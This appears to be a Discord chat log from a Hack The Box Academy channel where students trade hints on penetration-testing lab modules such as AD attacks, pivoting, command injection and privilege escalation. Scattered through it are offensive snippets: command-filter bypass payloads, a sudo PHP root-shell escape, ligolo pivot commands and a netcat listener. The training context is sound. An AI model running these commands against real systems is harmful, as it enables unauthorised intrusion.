#modules
Where do I go for the windows version?
just download the pre-compiled binary
All they showed was the ubuntu version in the module.
literally took me like 5 seconds to find using google
this is actually where you'll find the latest release for chisel
Hello everyone, I'm currently stuck on the FootPrinting hard lab and would like a push in the right direction.
161
or alternatively: udp
both my hints relate to the same thing
I've used 161 but I'm not really sure what to do after the initial command
also in the future it helps to give any bit of context to where you're stuck
wdym? you have the community string yeah?
Cool, I'll check the github releases. Thanks.
My bad, I will be sure to do so.
Is there a htb section on ligolo?
I'm at the beginning of metasploit and I've followed every step so far, but where I'm supposed to get control of the system the service times out. "Service start timed out" instead of what's supposed to happen, it doesn't even use ms17_010 as check, it just goes to target os
think: what service does that port relate to and what tools from one of the sections may help further
I'm not 100% sure
the result will be in brackets ||[b*]||
If not I found this
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5
man that @hallow kiln guy seems familiar
so; take a step back - you used onesixtyone to grab the community string, what step would be next to make use of it
yup, that's a good resource
if needed reread the section related to the service
I think thats my problem I can't get the community string, when I used 161 it just gave me a message saying "Scanning 1 hosts, 16383 communities"
I'm not 100% sure if I need to use a command from there or if I used the wrong command to begin with
you can add JH vid to it.
https://youtu.be/qou7shRlX_s?si=DyilZCOTTdCg5nAY
the SecLists snmp.txt file should work
i believe that's the one from the section
Okay let me give that a try, I thought I had used it but I may not have
it'll give you a bunch of info including the community string in brackets
it'll start with b
so it's completely easy to overlook
Thank you, I did just overlook it the first time. I'll continue from here and see if I can get the rest on my own, again thank you for your time!
no problem!
fun fact: I spent an hour on this because I didn't realize the obvious
(I didn't read the brief which would have been more revelatory)
Tried tunneling to MS01 on the AD Skills Assessment with
proxychains xfreerdp /v:172.16.6.100 /u:<user> /p:<pass>
and got some strange errors.
I used the following command on the windows box:
./chisel server -v -p 1234 --socks5
And this is my attack machine:
My proxychains is set up properly too
Why is this not working?
Just wanted to let you all know I got past the FootPrinting hard lab!
I also attempted with the reverse tunnel.
fun fact: ligolo doesn't use proxychains
so you don't gotta worry about any sorta proxy conf
Is there something I'm doing wrong here? I'm assuming that I should be able to finish the assessment with the tools covered before moving on to try a second time with ligolo.
i haven't messed with chisel before ¯\_(ツ)_/¯
ligolo is really simple to set up and get running tbh
Is RDP the correct method for this box? Just want to make sure I'm not wasting time. I see the tun0 in my ifconfig, but I can't even nmap the MS01 IP (172.xxx.xx.....)
idk haven't done it yet
proxychains and nmap don't play well together usually you'd have to add -Pn
It just keeps spamming this
I even got a fresh linux version to make sure the versions matched at v1.9.1
I used the NoPac exploit and received the TGT from both ACADEMY-EA-DC01.ccache and administrator_ACADEMY-EA-DC01.inlanefreight.local.ccache. I then updated the KRB5CCNAME with the ACADEMY-EA-DC01.ccache ticket. I then tried to use secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL. This is not working. Can someone explain to me what I can achieve with the ccache files?
Hello! I'm in the module "shells and payloads" at "The Live Engagement", I already have the shell... but not the flag
look
And the question is: Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt
||But there is nothing at C:\Users\Administrator||
Someone could help me pls?

I think you should reset the target and redo the steps
How did you get the shell btw?
By ||a web shell and then a reverse shell ||
Hmmmmm alright
I see, instead of port 80, there's a relatively easier approach via smb vulnerable to a popular exploit.
Review your Nmap scan results for relevant details.
I did again and get the same thing
Yeah, it seems that there is only one way 
Then use smb
Yeah, actually I did it before but there are like 4 or 5 exploits and it's kind of confusing which one is the correct one to use, anyway I'm still trying
One should catch your attention; it was demonstrated in the module.
Ready! it's done!
Thank you so much dude!
But it should have worked before with the web shell I think
No problem, host 3 is the easiest^^
I didn’t think of that vector once I saw smb.
I thought that smb was a kind of rabbit hole lol
Because I tried to enumerate with smbclient, smbmap, rpcclient and see if I could upload a file or something like that but there was nothing, but well, it's all about trying harder
more like trying simpler things.
Enumeration is the key.
The AD Enumeration and Attacks Skills Assessment is no joke
hey bro, did you solve this? if you solved it, can I dm you?
any tips for + 1 What is the FQDN of the IP address 10.10.34.136?
Information Gathering - Web Edition
Active Subdomain Enumeration
I NEED HELP WITH SOME PEOPLE
can anybody tell me why my responder is not catching the hash
In Documentation & Reporting Practice Lab We can send the report to mrb3n for him to check it out.. How can I get to him?
What module are you working on?
Responder
can someone tell me why this wont work ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://10.129.234.14 -H "HOST: FUZZ.inlanefreight.htb"
do I have to edit /etc/hosts
Stuck on ntlm relay attack skills assessment last question, I am not able to find any relay to compromise dc.. can someone give me a hint
In the Password Spraying section of the Crackmapexec module, I found the user, but I don't know the answer format, so I am basically wrong now. I would be grateful if someone would give a hint. This is the problem description: "Is there any other local MSSQL account created with the same username and password as the corresponding Active Directory account?"
lol, thanks, but this is an error, but I solved it
In the module for AD enums and attacks I had an issue getting the stuff for attacking domain trusts using linux from child -> parent, the forged ticket I had created wasn't getting me the NTLM hash of the user bross, and in order to get it I had to end up using a mix of raiseChild.py and then use my access with raisechild and magically transfer mimikatz into the DC for the parent domain and use mimikatz to get the hash for bross.
the thing is, as arduous as this was to do, I found it odd that despite following the structure in the section I wasn't able to get in with the forged ticket. I made sure to use the right SIDs for the forgery, namely the ones for the child domain and the one for the user bross in the parent domain. It was super frustrating and it gave out this odd error when I ran secretsdump to get the hash for bross: [-] ERROR_DS_NAME_ERROR_NOT_FOUND: Name translation: Could not find the name or insufficient right to see name.
practically had me cursing as I lost a ton of sleep to make this work, as something that should work just didn't, I'm literally going to bed angry lol ;c
I made sure to use the right SIDs for the forgery, namely the ones for the child domain and the one for the user bross in the parent domain - This isn't necessary. The parent SID user doesn't actually need to exist btw.
I cant really help you on the secretsdump because i ended up doing it the exact same way lol. Transfer mimikatz over and dumping the NTLM hash for the user bross.
Hello, I searched this, do you have an idea why?
Hello, do you have an idea why I don't find this :
Why can't I send messages in #710108839063846964?
Did you verify your account like #welcome tells you?
Hello to you all, anyone willing to discuss the foothold on Skills Assessment 2 in the "Intro NOSQL Injection" module?
NVM got it to work!
Hello lovely people! Your local village idiot here again with another stupid question!
I managed to upload LinEnum.sh to a machine with the path /var/www/html/theme.
I cannot execute the file even though the permissions look like this:
---x--x--x 1 www-data www-data 46631 Feb 7 10:01 LinEnum.sh
I did, but the permissions didn't change
Would it make a difference if I uploaded it to /usr/local/bin where I have some permissions?
can I dm you
help me change my ip address pls
what?
you can dm
Hi guys I've been stuck on this question for so long and keep getting left with a blank line ($ ... ) after I run the shellcode, I have no idea if I'm getting closer or further away, any help would be amazing. -- Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'. --
should include the module, section and question so that people know what you're asking about but here
#modules message
I'm getting a connection timed out on firefox in the parrot box. anybody had the same problem?
hello, has anyone finished the injection attacks skills assessment?
Cheers bud, my bad
In this module https://academy.hackthebox.com/module/87/section/904
There's hyperlink into parrot os website, and the link is 404 https://www.parrotsec.org/security-edition/
Yeah
can i dm you ?
sure
https://academy.hackthebox.com/module/109/section/1038
who$@ami
w\ho\am\i
Exercise: Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?
Could anyone figure out how to bypass the \ character in this exercise?
Module: Password Attacks
Hard Lab: https://academy.hackthebox.com/module/147/section/1356
Issue: Timeouts when attempting to download a particular file.
Solution: Bash script which loops the file download.
Question: Is there an alternative (easier) way to get this sorted out?
There are more ways to bypass blacklisted filters shown in this section. Try them as well
I know but the question is how to include a \ in whoami to be able to execute the command as it is on a blacklist
bypass the \
that's the question...
w'h'o'am'i
the point is how to bypass the \...
idk. Try the ones in the module.
w"h"o"am"i
w'h'o'am'i
%0aw'h'o'am'i
who$@ami
w\ho\am\i
who^ami
I think you didn't get the point
well, what do i know. Ive only gotten the flag
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.014/0.014/0.014/0.000 ms
www-data
weird huh
yeah me too, but the question is how to bypass the \ character with knowledge of the previous section.
IN **AD Enumeration & Attacks - Skills Assessment Part II
- Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host**
I want to upload a file to SQL01, I can enter to mssql as netdb, but can't upload files, so I don't know how to escalate privileges... (also found ||SeImpersonatePrivilege|| but I need to upload files for this too)
for example with:
echo $(tr '!-}' '"-~'<<<[)
\
or
echo ${PATH:0:1}
/
yeah ok. use the path
But I don't see the problem? You have an RCE that works. And you know how to bypass the / character using the PATH
that's the problem, there is no ENV for the \ character
and the only payload that may work is
echo $(tr '!-}' '"-~'<<<[)
but don't
think about how you can get a shell with mssql
well the \ is not common to find on a linux host. So unless you are on a windows host idk
yeah
what you could try is wordlist attack on ENV and see if you can find anything lol
idk lol
Attacking Thick Client Applications module is very bad...
Stuck on Attacking Common Applications: Attacking Common Applications - Skills Assessment II
Question:
Obtain reverse shell access on the target and submit the contents of the flag.txt file.
I have found the password for the nagXXX application. Trying to get a reverse shell using msfconsole, set every parameter correctly but it still keeps failing like this
Can anyone give a little nudge to solve this last question..!!!
With this section, I really went numb!!!!
I think you are using the wrong exploit
take it with a grain of salt tho since its been a while since this module
mmm....
ok need to use other exploit??
dm me the password you are trying
Try looking at the version and find a matching exploit
i want to make sure its correct
sent
point..
let me check again
damn, too quick
🤍
Lol you can ping that?
Hilarious. Imagine being the person who said something like that and it just guys replied to and called out lmao
always
i mean i ping it to notify those with the roles that someone is being a grade A dumbass with blatant rules violations
That happens a lot here
People trying to learn how to hack but can't read a small list of rules lmao
sometimes it can be benefit of the doubt and redirected: but it's not always the case
90% people just want to hack their ex; 10% people actually wanna learn
Stg. It's very cringe to see. In high school I've been asked many times to either hack something or teach somebody to hack. Some mf offered me $1000 before to teach him how to build a botnet 😂 mf hit me up on Facebook and I don't even ever talk to him. This was after high school was done with too. So random.
I bet he's in jail now lmao
Anyways I'll move over to general I just woke up and modules happened to be opened
(and shit I've realized people still ask after school)
A bit confused in the intro active directory module.. if anyone can help me that would be great.
I might be the worst hacker in the world
Just bashing my head into the table, watching people solve things that I seem incapable of doing
Hi all, can someone help me with the below question?
There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];
This is Snort Rule development in the SOC Analyst path.
why does it say "The Disabled Forced Restarts GPO will have precedence over the Logon Banner GPO since it would be processed last"
isn't the "disabled forced restarts GPO" under the "local security policy"?
Google says that "GPOs are processed in what's known as an LSDOU order: local, site, domain, organization unit (OU). That means first, the policy on the local computer gets processed. This is followed by Active Directory policies from the site level to the domain"
so wouldn't the "disabled forced restarts GPO" be overwritten by logon banner and thus the logon banner have precedence over the disabled forced restarts?
Hello everyone, I'm currently working on the CBBH certification and I just finished the section "Abusing Intermediary Applications" of the "Server-side attacks" module. On the practical side, I had no issues but when it comes to the usage of what I learned, I'm a bit confused. I don't see what's the practical usage of this. For other vulnerabilities, there were explanations and exercises on how to abuse the weakness. On this one, I just set up nginx and connect to a tomcat server but what's the following, how do we leverage that? Note that I'm a beginner in web penetration testing (I've only followed htb academy courses) and have close to zero knowledge of back-end server management. I would be very thankful if someone could explain to me what's the utility of accessing the target's tomcat panel.
I am very new to the platform and wanted to ask if I'll get unlimited instance spawns per day even if I purchase the minimum number of cubes? If yes, for how long will I get these unlimited spawns per day?
Thanks.
Windows File Transfer, am I using the Parrot OS web browser VM to perform the PS commands?
for unlimited pwnbox usage you need to do a monthly or annual sub, if you just buy cubes you don't get unlimited pwnbox usage. However, it is usually recommended to just set up your own VM and use that as pwnbox if you have the hardware to do that. It is easier and more comfortable
the point is that you set up a nginx server to connect to the TARGETs tomcat server via the ajp proxy. So you were able to get access to a internal website through the ajp protocol by setting up your own nginx and connecting to it
and getting access to tomcat is juicy because if you manage to get credentials for tomcat (and they might be set to the default credentials because the administrator of the server thinks that tomcat is not exposed to the internet) you can get a shell very quickly
Thank you 😉
hi guys i need help
Module: File Transfer
Section : Linux File transfer methods
Task: 2 ( + 3 Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer. )
does not accept my answer
my command on server : hasher upload_nix.zip
you need to unzip the file first
So I'm on the GetSimple part of "getting started" module and I got access to box fairly easy, but I'm having trouble with escalation. The LinEnum.sh file says that /usr/bin/php can be used without root so that means I need to make a PHP shell, right? But that's where I'm getting stuck.
I've tried this and I'm getting nowhere:
export CMD="/bin/sh" php -r 'system(getenv("CMD"));'
you need to tell it to actually run as root by using sudo
you are just allowed to run it as sudo without providing a pw
The whole command?
OR two parts separately? I know that's a stupid question but I don't know the answer
it works, thx for the help
Also thank you for helping
it won't allow you to run the first part as sudo (you can only do /usr/bin/php, remember), so only that part. You can do both lines in one by doing php -r 'system("/bin/sh")', GTFOBins likes to split command and execution but its not necessary to do so
Hi, can someone help me with double-pivoting with ligolo? I tried some guides but none worked for me
single pivot works though?
Yes
I've been using it consistently and want to keep using it for double pivot as well
Thank you! Now it is returning PHP Parse Error: syntax error, unexpected end of file in Command line code on line 1
I'm not sure if I ever used it for double pivot, but my notes say listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp on your attack host (in ligolo proxy), then ./agent.exe -connect 172.16.8.120:11601 -ignore-cert on the machine that can connect to the second internal network to connect it to the machine in the first internal network (172.16.8.120 here) and then add the new network on your attack host sudo ip route add 172.16.9.0/24 dev ligolo
oh, it needs a ";" after the ")"
php -r 'system("/bin/sh");'
OMG it worked thank you 😭
LOL that's the same task I'm on and I need the double pivot for
So I've done that, and I get a connection back to ligolo, but then this happens:
[Agent : root@dmz01] » INFO[4166] Agent joined. name="INLANEFREIGHT\\Administrator@DC01" remote="127.0.0.1:37764"
[Agent : root@dmz01] »
[Agent : root@dmz01] » session
? Specify a session : 4 - #4 - INLANEFREIGHT\Administrator@DC01 - 127.0.0.1:37764
[Agent : INLANEFREIGHT\Administrator@DC01] » start
error: a tunnel is already using this interface name. Please use a different name using the --tun option
I'm not sure if you even need to do the "session" and "start" part for the second pivot?
Thank you
I can't ping rn, so I guess I need them
It doesn't make sense that we wouldn't need them, as a session established doesn't start active tunneling to another network
In @hallow kiln's blog it gets the following error message: Tunnel already running, switch from <first agent> to <second agent>? Y/N, but for me it just fails for some reason
How did you get on? I am having similar problems.
looking at the code, they reworked that part 2 months ago in ligolo-ng
I guess you have to set up another tun interface and do "start --tun newinterface" ?
yap, I tried it before and it failed for a stupid reason, but now it works. Thanks!
yeah, my post is older than the latest release, they've switched some things up now, I was gonna link to this message #modules message but sounds like you got it working
Yeah, thanks! I really appreciate all the help
well he can't fuzz for the password because LDAP would be dumb to let you search for a user's pw. They had to guess (or maybe there was a hint in the machine) that an administrator set up the account like that and put the password as the description string to remember it easier, thinking that no one has access to the description
isn't analysis still an active box, why is there a writeup and why are you sharing it
You can stop and start sessions btw, it can get a tiny bit tedious, the other option is creating another tunnel for you to specify with start
Hello there, I'm doing the step-by-step of User Account Control section under WinPrivEsc, but when I fired up the command to receive a reverse shell based on the dll {under user path} the reverse shell is not received, any idea why or what can I be missing?
In this case I can't, because the second session is dependent on the tunnel the first session creates
I just added another interface as you and others suggested and used it
It's not
Once you have the second session you can stop and start the second one
Source: I did it
wdym? Stop the first session?
Select session 1: stop
Select session 2: start
It is active but expired. Will not gain anything if pawned.
Was sure this would trigger miscomprehension, this is why I added context info and carefully shadowed information. Apparently, not everyone is responsible for reading what they read. I let the moderators do their moderation, and apologize for the situation
The older versions would do that swap seamlessly
then I got session2 lost connection.., because it's dependent on the tunnel of session1
So now it doesn't 😦
This channel isn't for any conversation regarding boxes
which one is?
This channel is specifically for academy modules
it says i have no access
Man if only there was a way to gain access
Some sort of instructions or something
wonderful "community"
you still gain points, just not seasonal, active boxes are still active boxes, no public writeups allowed, seasonal is another thing
Seasonal boxes are still in active rotation
I also reported the writeup via /spoiler
👍
But anyway; instructions on accessing more of the server is found in #welcome
well, I thought it was a place to learn and share, apparently it's a place where to lose time wondering if I should ask a question when everyone is unwilling to hear that, sorry, my experience is bad, I quit, thanks, bye
Module: HTTPS/TLS ATTACKS
Section: Bleichenbacher & DROWN
Question: Performing this section's questions is proving painful. Working with TLS-Breaker had all kinds of errors being thrown which prevented the premaster secret from being dropped. I tried working with alternative tools to nab it, but the output doesn't appear compatible with the expected formatting. Is someone available to DM for aid?
I like this mode to ask....
im getting unable to write to file. Any ideas why?
Have you tried asking nicely?
What module? Maybe you're not supposed to write to this file
Or there is a file in that portion that can be written to
I'm doing the enterprise attack
I'm doing the Attacking Enterprise Networks
I'm following the steps and it says to edit that 404.php file
I am doing the brute force module on the ssh page, I am pasting the exact command I have to send but it is giving me this error
Ah most people do that blind
Try to reset?
Most people treat AEN as a mock cpts exam
Yo marice, I just finished the CPTS path, how do you recommend to prepare for the exam?
Just jump into it
the more you try and prepare, the more likely you are to overthink ¯\_(ツ)_/¯
well I was treating it like that but then couldn't write to the 404.php and went to see the writeup and it was saying to do the same thing I was already doing...
You're right, any advice about set up? Other than using ligolo, maybe set up a windows vm, etc
guys am I tripping? or is this paragraph self contradictory ?
"The GPO with the lowest Link Order is processed last"
"the Disallow LM Hash GPO will be processed first"
"Lowest" as in highest number, longer list
It's like firewall rules
It goes in-order
oh
alright that makes more sense. thanks
Ye, its silly like that
anyone know the answer to this?
even in their own questionnaire they contradict themselves
It's not a contradiction
Domain overwrites site.
No matter what's done locally, if domain says "you can't do that" then you can't do that
that's my understanding as well.. but read this, it contradicts that
How do i use a reverse connection without open port in router?
actually wait... now that I read it more I understand what they mean. What I was thinking was that "OU containing user or computer objects" means the local computer so that would mean the "local security policy".
... I think
What should i do to use a reverse connection without open a port in router?
What are you trying to do?
Repeating your question doesn't add clarity
If you're trying to get a reverse connection on a public site you will need to do port forwarding. But it sounds like you're trying to do something illegal, more context is needed
Trying to exploit my own phone with a payload created in msfconsole
But the connection does not establish because of the port, I am not finding it opened
I tried to configure it in the router configs, no success
My network is LAN I think
Well if they're on the same network you don't need to do any router configs
But even with the LAN IP I am not being able
This has nothing to do with htb academy however
I fill in my IP but I need a port and I don't know which one
All you need is to start a listener on your device netcat -lvnp 9999
Then use that port
Alright will try it
can I copy ur style?
WinPrivEsc | UAC section, the reverse shell by SystemPropertiesAdvanced.exe is not working..!!!, I'm doing what is explained in the content, any hint would be appreciated...
AD Enumeration & Attacks - Skills Assessment Part I, Question 6, "Submit this user's cleartext password. ", any tips how to get it ? I've spent many hours already in just one question...
?
As a windows system engineer, I would say every GPO you apply from an OU should be considered a "Global" policy, "local security policy" should refer to something like settings applied directly to the machine.
For example, applying a hardening configuration to a windows machine before domain join <- this should be considered a "local security policy".
A little bit late in the party but if you still have problem with this send me a DM.
Whatever you'd like to do, friend.
I list all of that other information to help others help me. If they know the section/module upfront, its easier to contextualize the problem
Module : Server Side Attacks, Section: SSRF Exploitation Example. Hi, I have a problem of understanding with this section. Indeed, after we find the first SSRF, we fuzz the ports of the localhost and find this "http://<TARGET IP>/load?q=http://127.0.0.1:5000" and it says it's an app but then when we want to look at the "index.php" of this app we go look at "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html" why? I tested to curl "http://<TARGET IP>/load?q=http://127.0.0.1:5000/load?q=index.html" instead but it didn't work. In my understanding, we fuzz the ports to discover the internal app but my first question is: How do we know that 127.0.0.1:5000 maps to internal.app.local (except the fact that it is an exercise and there is only one port and only one internal app)? In this exercise, it looks like we don't really care that there is an application listening on 127.0.0.1:5000 as we know (from the page source of the very first ip) that an "internal.app.local" exists, furthermore I don't even understand why we care about fuzzing the ports. As you can see I'm a bit lost and would appreciate a little help. Thank you in advance.
Linux file transfer, curl and wget are both not working. Says unable to connect. The question says to use python but I dont see any download tools with python. Anybody available to assist?
If you're using pwnbox: is the target a public_ip:port? The pwnbox has limited internet functionality if you didn't buy any cubes or a sub
Using my own VM
Second part of my question: public-ip:port?
not sure what you mean by that
How is the target given to you
Is it 10.129.x.x or something like 94.124.24.223:12345
10.129.202.54
Ah OK then. Are you connected to the vpn?
yea
Last question: what's your command?
wget https://<target-ip>/flag.txt -O flag.txt
The amount of times I slap my forehead going through this course
Most of the times the targets aren't running https
I should have known to atleast try http
I've been stuck at the same part for a bit now, linux introduction, system information, I am tasked with giving the directory in which the htb-student mail is found, yet after searching through what feels like every directory I have found absolutely nothing
does anyone have a push in the right direction?
have you tried locate or find commands?
This won't actually help
i have yea
However
env
Or
echo $MAIL
i am so dumb.
i tried that and forgot to add the $
are there no channels discussing machines??
@reef birch thank you mate I did it 🙂
Bumping for visibility:
Module: HTTPS/TLS ATTACKS
Section: Bleichenbacher & DROWN
Question: Performing this section's questions is proving painful. Working with TLS-Breaker had all kinds of errors being thrown which prevented the premaster secret from being dropped. I tried working with alternative tools to nab it, but the output doesn't appear compatible with the expected formatting. Is someone available to DM for aid?
thanks! @fathom pendant
it really takes time to dump the key, I spent all 90 minutes of the spawned machine. Also TLS-Breaker works fine with Java 11 but with Java 17 for me it didn't run.
Module: WinPrivEsc
Section: User Account Control
Question: I'm doing what is explained in the section to escalate privileges thru the SystemPropertiesAdvanced.exe attack and it's not working {DLL with reverse shell payload is placed into the user Path}
I'm working my way through "SIEM & SOC Fundamentals" and just read the "What Is A SIEM Use Case?" section under "SIEM Use Case Development".
I'm having a hard time grasping what this section is trying to tell me. I took a stab at trying to summarize it for my notes:
It feels like what they are trying to communicate is you design a use case for the data/logs/events you record in a SIEM
- Example: We collect logs for login attempts, we can configure events for failed login attempts, the use case for these events is we can detect malicious actors attempting to brute force an account
Does that seem about right?
Link to the specific page: https://academy.hackthebox.com/module/211/section/2253
Yeah, it took me a minute to realize that the TLS-Breaker Github Wiki explicitly says JDK 11. That's what was having me get hung-up
Thank you
I think it's just two exercises in one. On one hand it shows you that you can scan for internal services by port fuzzing, on the other hand it shows you that you can also fuzz for internal vhosts by putting the full url. I guess the exercise wants you to know that you have those options and should be open to them when you find an SSRF. The port 5000 and internal.app.local have nothing to do with each other
Technically you can’t even be sure that internal.app.local is even on the same host. It could be on a completely different host that is accessible from the host you are attacking
finally 🙂
Nice, good job! That was an annoying one
hehe yes
hard lab was quite hard tbh 🙂
but i learned a lot
and those labs are quite realistic to real world pentesting
And back and forth and back and forth
Honestly my favorite lab as it ties a bunch of knowledge together
someone help, i found a valid password to login to ssh and i know for a fact i'm supposed to use a password and i'm getting this when trying to login:
ssh harry.potter@94.237.54.48 -p 22
harry.potter@94.237.54.48: Permission denied (publickey).
from what i understand that means the server only accepts public key auth but the exercise says i'm supposed to find a password
help🥲
looks like wrong port
the port should be given as a part of target ip
Biggest skill issue right there, Identifying public ips
😅
It's honestly troubling how deep some people get into the respective paths and don't know
the deeper the path goes the more they let you fly, but yes
i so sucked @ easy lab because i was way overthinking 😄
That's generally how the easy labs are
You're thrown at a combination of taught subjects and don't know where to start
Then by the time you're in the headspace for hard it's gg ez
The only one that tripped me up was footprinting hard, but that's bc I can't read 
Hey, I'm working on a report for the Attacking Enterprise Networks module (I've already finished the labs) and I am a bit lost. If anyone has an example report they wrote with sysreptor for this module/other module/other network and can send it to me (free to dm) to use as a reference guide I would be very grateful
Ask ChatGPT 😉
(seriously)
hey has anyone done intro to assembly language
I am a bit stuck on assessment 1 I have completed everything else
any help please pm me I am struggling been on this for couple days now
Can't we buy another monthly subscription before month ends?
It's generally on an autorenew
Hey Marcie, I want to cancel PayPal as payment method and add credit card as payment method. I am able to cancel it from PayPal, any insight?
Message support
I'm not staff so I wouldn't know how their payment processing works
Doing that right now as we chat
I have searched server, it's persistent issues with many, HTB resets the payment method from backend.
And wooo...!!!
Just finished the Attacking Thick Client Applications and Exploiting Web Vulnerabilities in Thick Client Applications.
It's not as bad as people are making it out to be, the content is really good in the sense that you might stumble across a jar application and then the teachings of that section become invaluable. Could it be re-written for a clearer explanation? Sure, but one can make a case that all the content in Academy could be re-written for clearer explanations, and banging your head against the wall sometimes is good.
Being that, in the Attacking Thick Client Applications all you have to do is follow the examples. For some reason powershell only runs if you run it as an admin. Other than that it all boils down to following the example. Exactly as is shown.
In the Exploiting Web Vulnerabilities in Thick Client Applications the IP address of server.fatty.htb is already on the hosts file. You don't need to add it. You just need to check the file for the IP, then you'll know which interface you should use to listen with Wireshark.
The main takeaway in this module is that, you have the original Jar file, and then you mod this jar file so that it connects to the server. Further modifications need to be compiled. When you save the source code as shown on the module, you're saving the code that it's not compiled. Remember that .java files are not compiled, the compiled ones are .class.
All the module asks of you is to have two folders, one for the source code you'll need to modify, and the other one for the compiled files that will be built resulting in the .jar file. All you need to do is modify and compile the files you need, and swap them into their respective folder in the folder you'll be using to generate the .jar file. Every time you swap files you'll need to generate a new jar file. And that's it. Really
The complaint isn't that it's bad; the complaint is that it's thrown in out of nowhere with little-to-no coding background/lead up to Java decompiling
It would be better if there was some other thing or if the pre-requisite Fundamentals covered some basics
But it was literally a late addition to the module
The other complaint being that it revolves around a retired insane machine
Where most stuff in the path is easy-medium modules comparatively
alright guys we finally did it! we finally after 7 days of agony, we have finally made it to the AD enumeration and attacks assessment!
I mean, the module pretty much chews all the content and it gives all the code you need and specifically tells you where and how to put it.
I really don't mind the challenge, what I do mind is answering questions where I have the right answer but have to try 10 different variations because no format was given, this is something that needs to be addressed ASAP.
It originally didn't
It took a boatload of complaints for it to be what it is now
You said it right..! Just have to follow the sections..!
But there were situations, for example where the address in x64dbg in the thick client application section did not appear. After running multiple times repeating the same steps, it appeared.
Yes nothing is perfect and hence the contents are..!! Feedback and rectifications make things better..!
Like a lot of the original complaints is that it
- Came out of nowhere
- Was nowhere near the same quality
But the people who were originally complaining about it are valid to complain, especially considering that portion isn't on the exam (yet) as there hasn't been word about the exam changing yet
So I finally figured out chisel on the Active Directory Skills Assessment 1 and was able to nmap the MS01 computer, however, port 3389 is closed and psexec is not working.
Is there a way to proxychains port 80, as in get access to the web interface if there is one open on port 80?
I see most people in the forum that got stuck were finally able to get to MS01 with xfreerdp, but that port is closed.
What other options do I have with ports 80, 139, 135, and 445?
I've done crackmapexec but that doesn't do a whole lot.
What can I do with this, anything?
I did crackmapexec with the --shares option
I have creds and now my chisel and proxychain configuration is working, what other options do I have to get this?
Tried evil-winrm, that didn't work either
I have no idea.
Even tried mssqlclient.py
for hydra, "-t" whats a common task number to add to improve speed or performance?
gotcha, ima try that
Some people can do 64 with no problems, I tend to get dropped connections with it
I got smbclient to work, but there's really nothing useful in the files that I can find
Tried port 80, but the website just hangs
Should any of this be working? What am I missing?
if you route the whole http traffic through the victim host and the victim host has a website that tries to load external data (like a js file or a font from google), but the host itself has no internet, then you will try to load these external resources through the no-internet host and it will load for a long time and not work properly
I got rpcclient rockin, but no good information
There is just no way for me to get a shell it feels like.
try curling the website so you at least know whats on there
it shouldn't hang with curl
Hey guys, I'm currently working on the FFUF skill assessment, and I'm pretty sure I got a good response which doesn't fit in the HTB input
Can anyone tell me where I'm wrong ?
/module/54/section/511
If anybody tries one day to search: the reply is not whateverdomain.academy.htb:448484/dir/found.xsx but whateverdomain.academy.htb:PORT/dir/found.xsx
I'm stuck on Academy Footprinting lab Hard
I've done Nmap with ports open, but don't know how to enumerate further
are you using the correct port? use the port they give you with the target instead.
You need to use the port that comes with the target
how can i see only modules that are relevant for the path im taking cbbh?
Enroll in the path and you will able to see them
i can see everything not only the modules that are relevant for my path
i have the annual sub
found it
wdym, for an example report?
why are targets not spawning ?
Hi everyone, i am sitting at the DCSync section in Active Directory Enumeration & Attacks and have a question. In the module it says "For the portion of this section that requires interaction from a Linux host (secretsdump.py) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!" but when i ping the ip address 172.16.5.225 i get a request timeout and when i try to log on to the machine via ssh it says that the password is wrong ... what should i do ?
are you trying to ssh from your attack machine or MS01? only MS01 can access 172.16.5.225
i'm trying to ssh from MS01
ligolo showing connection failed any thoughts how to troubleshoot that?
I want technical support
?
Why was my name changed?
read the #rules and you will find out. Anyway, wrong place to be asking. cya
Hey just checking if anyone has done the intro into assembly language assessment 1
I have modified and changed and recreated the code multiple times but I am unsure what to put in for answer
Please someone on here must be able to guide me in right direction I have done the second assessment
If you decrypt and run the code it will print a flag in the HTB{} format
ok thank you what am I decrypting though what part?
just the python decoder, it isn't part of the gdb and I am running that with modified code. I have even resorted to checking with ai to see if i'm missing something, and my code I know xors it turning it into 8 bytes, does that decrypt it?
well the task comes with a loaded_shellcode.zip
and you have to decode it by xoring everything like it says
and the result is shellcode that you can run that prints the flag
ok maybe i am way off track, so do I decode it in gdb or separately with the python program
damn i'm so lost with this one, it has been like 50+ hours on it. any chance I could personally message you my code so u could have a look for me?
sorry to be a pain mate, just out of options, I have even tried the ai
sure, I can try to remember how its done lol
I did that recently and just remember you need to loop thru the stack 8 bytes at a time
would you be ok with me sending you my code so you can see if my code's right, then tell me what to actually get from the decoding? I really am lost on it, thank you for replying people
I am lost as to whether the finished product will come up as the HTB{} or the 0xnwand39 code that i use python to decrypt
pwn
Send to me I can check later
Hello Hackers!
I am planning to purchase CDSA using the Student Subscription. After research I came to know that "SOC Analyst Prerequisites" is a prerequisite to start this course. My question is: will I get free access to the "SOC Analyst Prerequisites" skill set module?
Yep, all modules up to and including tier 2
Also you don't get the cdsa voucher with student sub
